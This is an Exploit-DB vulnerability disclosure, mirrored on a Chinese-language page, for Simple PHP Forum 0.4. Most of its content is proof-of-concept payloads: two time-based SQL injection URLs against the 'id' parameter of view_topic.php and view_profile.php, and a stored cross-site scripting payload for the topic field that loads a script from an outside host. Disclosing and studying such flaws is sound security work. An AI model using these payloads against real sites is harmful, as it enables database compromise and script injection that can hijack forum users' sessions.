sphpforum 0.4 – Multiple Vulnerabilities

• Exploit Database
• 36 阅读

• 作者： loneferret
  日期： 2012-08-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/20546/

• # Author: loneferret of Offensive Security
  # Product: sphpforum
  # Version: 0.4 (older versions may be affected)
  # 
  # Software Download: http://sourceforge.net/projects/sphpforum/
  
  # Description:
  # Simple PHP Forum is a PHP based forum/BBS board is designed to be small, simple, 
  # fast and allow easy integration into any existing web site.
  
  # Vulnerability:
  # Due to improper input sanitation, parameters are prone to SQL injection. Stored
  # crossed site scripting is also present in some forms.
  
  # PoC 1:
  # SQL Injection
  # Page: view_topic.php / view_profile.php?
  # Vulnerable param: 'id'
  # http://172.16.194.148/sphpforum/sphpforum-0.4/view_topic.php?id=50%27%20and%20sleep%2810%29%20and%20%271%27=%271
  # http://172.16.194.148/sphpforum/sphpforum-0.4/view_profile.php?id=loneferret%27%20and%20sleep%2810%29%20and%20%271%27=%271
  
  # PoC 2:
  # Stored XSS
  # Page: create_topic.php
  # Vulnerable field: Topic
  # Payload: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>